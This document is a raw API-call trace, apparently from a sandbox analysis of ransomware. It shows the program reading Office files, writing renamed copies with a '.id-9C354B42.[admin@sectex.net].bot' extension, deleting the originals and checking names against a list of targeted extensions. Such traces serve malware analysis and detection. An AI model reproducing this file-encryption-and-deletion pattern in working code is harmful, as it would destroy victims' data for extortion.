	[0161.310] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe4, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe4, lpOverlapped=0x0) returned 1
	[0161.310] SetEndOfFile (hFile=0x37c) returned 1
	[0161.310] CloseHandle (hObject=0x37c) returned 1
	[0161.311] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0161.311] SetEndOfFile (hFile=0x3c4) returned 1
	[0161.313] CloseHandle (hObject=0x3c4) returned 1
	[0161.313] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0161.313] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\post.cfg")) returned 1
	[0161.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.314] lstrlenW (lpString=".doc") returned 4
	[0161.314] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.314] lstrlenW (lpString=".docx") returned 5
	[0161.314] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0161.314] lstrlenW (lpString=".pdf") returned 4
	[0161.314] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.314] lstrlenW (lpString=".xls") returned 4
	[0161.314] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.314] lstrlenW (lpString=".xlsx") returned 5
	[0161.314] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0161.314] lstrlenW (lpString=".ppt") returned 4
	[0161.314] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.314] lstrlenW (lpString=".zip") returned 4
	[0161.314] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.314] lstrlenW (lpString=".rar") returned 4
	[0161.314] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.314] lstrlenW (lpString=".bz2") returned 4
	[0161.314] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.314] lstrlenW (lpString=".7z") returned 3
	[0161.314] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.314] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.315] lstrlenW (lpString=".dbf") returned 4
	[0161.315] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.315] lstrlenW (lpString=".1cd") returned 4
	[0161.315] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.315] lstrlenW (lpString=".jpg") returned 4
	[0161.315] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.315] lstrlenW (lpString=".doc") returned 4
	[0161.315] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0161.315] lstrlenW (lpString=".docx") returned 5
	[0161.315] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0161.315] lstrlenW (lpString=".pdf") returned 4
	[0161.315] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0161.315] lstrlenW (lpString=".xls") returned 4
	[0161.315] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0161.315] lstrlenW (lpString=".xlsx") returned 5
	[0161.315] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0161.315] lstrlenW (lpString=".ppt") returned 4
	[0161.315] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0161.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.315] lstrlenW (lpString=".zip") returned 4
	[0161.315] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0161.315] lstrlenW (lpString=".rar") returned 4
	[0161.315] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0161.315] lstrlenW (lpString=".bz2") returned 4
	[0161.315] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0161.315] lstrlenW (lpString=".7z") returned 3
	[0161.315] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0161.315] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.316] lstrlenW (lpString=".dbf") returned 4
	[0161.316] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0161.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.316] lstrlenW (lpString=".1cd") returned 4
	[0161.316] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0161.316] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POST.CFG") returned 62
	[0161.316] lstrlenW (lpString=".jpg") returned 4
	[0161.316] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0161.316] lstrcmpiW (lpString1=".CFG", lpString2=".bot") returned 1
	[0161.316] lstrlenW (lpString="POSTIT.CFG") returned 10
	[0161.316] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postit.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x398
	[0162.705] GetFileSizeEx (in: hFile=0x398, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=777) returned 1
	[0162.705] CloseHandle (hObject=0x398) returned 1
	[0162.705] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postit.cfg")) returned 0x20
	[0162.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postit.cfg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0162.725] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postit.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0162.726] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.726] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0162.726] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postit.cfg.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.035] GetLastError () returned 0x0
	[0163.035] ReadFile (in: hFile=0x1b4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x309, lpOverlapped=0x0) returned 1
	[0163.036] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x310, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x310, lpOverlapped=0x0) returned 1
	[0163.037] ReadFile (in: hFile=0x1b4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.037] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0163.037] SetEndOfFile (hFile=0x37c) returned 1
	[0163.037] CloseHandle (hObject=0x37c) returned 1
	[0163.037] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.037] SetEndOfFile (hFile=0x1b4) returned 1
	[0163.039] CloseHandle (hObject=0x1b4) returned 1
	[0163.039] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.714] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\postit.cfg")) returned 1
	[0163.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.714] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.714] lstrlenW (lpString=".doc") returned 4
	[0163.714] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.714] lstrlenW (lpString=".docx") returned 5
	[0163.714] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0163.714] lstrlenW (lpString=".pdf") returned 4
	[0163.714] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.714] lstrlenW (lpString=".xls") returned 4
	[0163.715] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.715] lstrlenW (lpString=".xlsx") returned 5
	[0163.715] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0163.715] lstrlenW (lpString=".ppt") returned 4
	[0163.715] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.715] lstrlenW (lpString=".zip") returned 4
	[0163.715] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.715] lstrlenW (lpString=".rar") returned 4
	[0163.715] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.715] lstrlenW (lpString=".bz2") returned 4
	[0163.715] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.715] lstrlenW (lpString=".7z") returned 3
	[0163.715] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.715] lstrlenW (lpString=".dbf") returned 4
	[0163.715] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.715] lstrlenW (lpString=".1cd") returned 4
	[0163.715] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.715] lstrlenW (lpString=".jpg") returned 4
	[0163.715] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.715] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.715] lstrlenW (lpString=".doc") returned 4
	[0163.715] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1
	[0163.715] lstrlenW (lpString=".docx") returned 5
	[0163.715] lstrcmpiW (lpString1=".docx", lpString2="T.CFG") returned -1
	[0163.715] lstrlenW (lpString=".pdf") returned 4
	[0163.715] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1
	[0163.715] lstrlenW (lpString=".xls") returned 4
	[0163.715] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1
	[0163.715] lstrlenW (lpString=".xlsx") returned 5
	[0163.716] lstrcmpiW (lpString1=".xlsx", lpString2="T.CFG") returned -1
	[0163.716] lstrlenW (lpString=".ppt") returned 4
	[0163.716] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1
	[0163.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.716] lstrlenW (lpString=".zip") returned 4
	[0163.716] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1
	[0163.716] lstrlenW (lpString=".rar") returned 4
	[0163.716] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1
	[0163.716] lstrlenW (lpString=".bz2") returned 4
	[0163.716] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1
	[0163.716] lstrlenW (lpString=".7z") returned 3
	[0163.716] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1
	[0163.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.716] lstrlenW (lpString=".dbf") returned 4
	[0163.716] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1
	[0163.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.716] lstrlenW (lpString=".1cd") returned 4
	[0163.716] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1
	[0163.716] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\POSTIT.CFG") returned 64
	[0163.716] lstrlenW (lpString=".jpg") returned 4
	[0163.716] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1
	[0163.716] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.716] lstrlenW (lpString="SCDCNCLL.ICO") returned 12
	[0163.716] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncll.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0163.717] GetFileSizeEx (in: hFile=0x3a4, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=1078) returned 1
	[0163.717] CloseHandle (hObject=0x3a4) returned 1
	[0163.719] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncll.ico")) returned 0x20
	[0163.720] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncll.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncll.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4
	[0163.720] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.720] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.720] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncll.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0163.721] GetLastError () returned 0x0
	[0163.721] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x436, lpOverlapped=0x0) returned 1
	[0163.800] WriteFile (in: hFile=0x3ac, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x440, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x440, lpOverlapped=0x0) returned 1
	[0163.801] ReadFile (in: hFile=0x3a4, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0163.801] WriteFile (in: hFile=0x3ac, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0163.801] SetEndOfFile (hFile=0x3ac) returned 1
	[0163.801] CloseHandle (hObject=0x3ac) returned 1
	[0163.801] SetFilePointerEx (in: hFile=0x3a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.801] SetEndOfFile (hFile=0x3a4) returned 1
	[0163.803] CloseHandle (hObject=0x3a4) returned 1
	[0163.803] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0163.847] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncll.ico")) returned 1
	[0163.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.848] lstrlenW (lpString=".doc") returned 4
	[0163.848] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.848] lstrlenW (lpString=".docx") returned 5
	[0163.848] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.848] lstrlenW (lpString=".pdf") returned 4
	[0163.848] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.848] lstrlenW (lpString=".xls") returned 4
	[0163.848] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.848] lstrlenW (lpString=".xlsx") returned 5
	[0163.848] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.848] lstrlenW (lpString=".ppt") returned 4
	[0163.848] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.848] lstrlenW (lpString=".zip") returned 4
	[0163.848] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.848] lstrlenW (lpString=".rar") returned 4
	[0163.848] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.848] lstrlenW (lpString=".bz2") returned 4
	[0163.848] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.848] lstrlenW (lpString=".7z") returned 3
	[0163.848] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.848] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.849] lstrlenW (lpString=".dbf") returned 4
	[0163.849] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.849] lstrlenW (lpString=".1cd") returned 4
	[0163.849] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.849] lstrlenW (lpString=".jpg") returned 4
	[0163.849] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.849] lstrlenW (lpString=".doc") returned 4
	[0163.849] lstrcmpiW (lpString1=".doc", lpString2=".ICO") returned -1
	[0163.849] lstrlenW (lpString=".docx") returned 5
	[0163.849] lstrcmpiW (lpString1=".docx", lpString2="L.ICO") returned -1
	[0163.849] lstrlenW (lpString=".pdf") returned 4
	[0163.849] lstrcmpiW (lpString1=".pdf", lpString2=".ICO") returned 1
	[0163.849] lstrlenW (lpString=".xls") returned 4
	[0163.849] lstrcmpiW (lpString1=".xls", lpString2=".ICO") returned 1
	[0163.849] lstrlenW (lpString=".xlsx") returned 5
	[0163.849] lstrcmpiW (lpString1=".xlsx", lpString2="L.ICO") returned -1
	[0163.849] lstrlenW (lpString=".ppt") returned 4
	[0163.849] lstrcmpiW (lpString1=".ppt", lpString2=".ICO") returned 1
	[0163.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.849] lstrlenW (lpString=".zip") returned 4
	[0163.849] lstrcmpiW (lpString1=".zip", lpString2=".ICO") returned 1
	[0163.849] lstrlenW (lpString=".rar") returned 4
	[0163.849] lstrcmpiW (lpString1=".rar", lpString2=".ICO") returned 1
	[0163.849] lstrlenW (lpString=".bz2") returned 4
	[0163.849] lstrcmpiW (lpString1=".bz2", lpString2=".ICO") returned -1
	[0163.849] lstrlenW (lpString=".7z") returned 3
	[0163.849] lstrcmpiW (lpString1=".7z", lpString2="ICO") returned -1
	[0163.849] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.849] lstrlenW (lpString=".dbf") returned 4
	[0163.850] lstrcmpiW (lpString1=".dbf", lpString2=".ICO") returned -1
	[0163.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.850] lstrlenW (lpString=".1cd") returned 4
	[0163.850] lstrcmpiW (lpString1=".1cd", lpString2=".ICO") returned -1
	[0163.850] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLL.ICO") returned 66
	[0163.850] lstrlenW (lpString=".jpg") returned 4
	[0163.850] lstrcmpiW (lpString1=".jpg", lpString2=".ICO") returned 1
	[0163.850] lstrcmpiW (lpString1=".ICO", lpString2=".bot") returned 1
	[0163.850] lstrlenW (lpString="SCDCNCLS.ICO") returned 12
	[0163.850] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncls.ico"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0163.873] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=2998) returned 1
	[0163.873] CloseHandle (hObject=0x25c) returned 1
	[0163.873] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncls.ico")) returned 0x20
	[0163.883] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncls.ico.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0163.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncls.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e8
	[0163.891] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.891] SetFilePointerEx (in: hFile=0x3e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0163.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\FORMS\\1033\\SCDCNCLS.ICO.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\forms\\1033\\scdcncls.ico.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0163.892] GetLastError () returned 0x0
	[0163.892] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0xbb6, lpOverlapped=0x0) returned 1
	[0163.893] WriteFile (in: hFile=0x37c, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xbc0, lpOverlapped=0x0) returned 1
	[0163.894] ReadFile (in: hFile=0x3e8, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
